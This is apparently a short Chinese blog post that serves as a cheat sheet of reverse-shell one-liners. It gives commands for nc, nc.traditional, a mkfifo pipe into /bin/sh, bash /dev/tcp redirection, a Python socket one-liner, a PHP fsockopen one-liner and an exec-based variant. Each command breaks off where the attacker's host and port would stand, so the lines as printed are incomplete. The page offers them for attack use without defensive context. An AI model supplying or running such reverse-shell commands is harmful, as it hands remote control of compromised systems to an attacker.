# nc反弹常用命令
“`bash
用 nc 反弹,命令如下:
nc
某些目标的 nc 不支持 -e 参数,有两个解决思路,要么使用其他版本的 nc:
nc.traditional
要么配合命名管道进行反弹:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc
用 bash 反弹:
/bin/bash -i >& /dev/tcp/
用 python 反弹:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“
用 PHP 反弹:
php -r ‘$sock=fsockopen(“
用 exec 反弹:
0<&196;exec 196<>/dev/tcp/
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容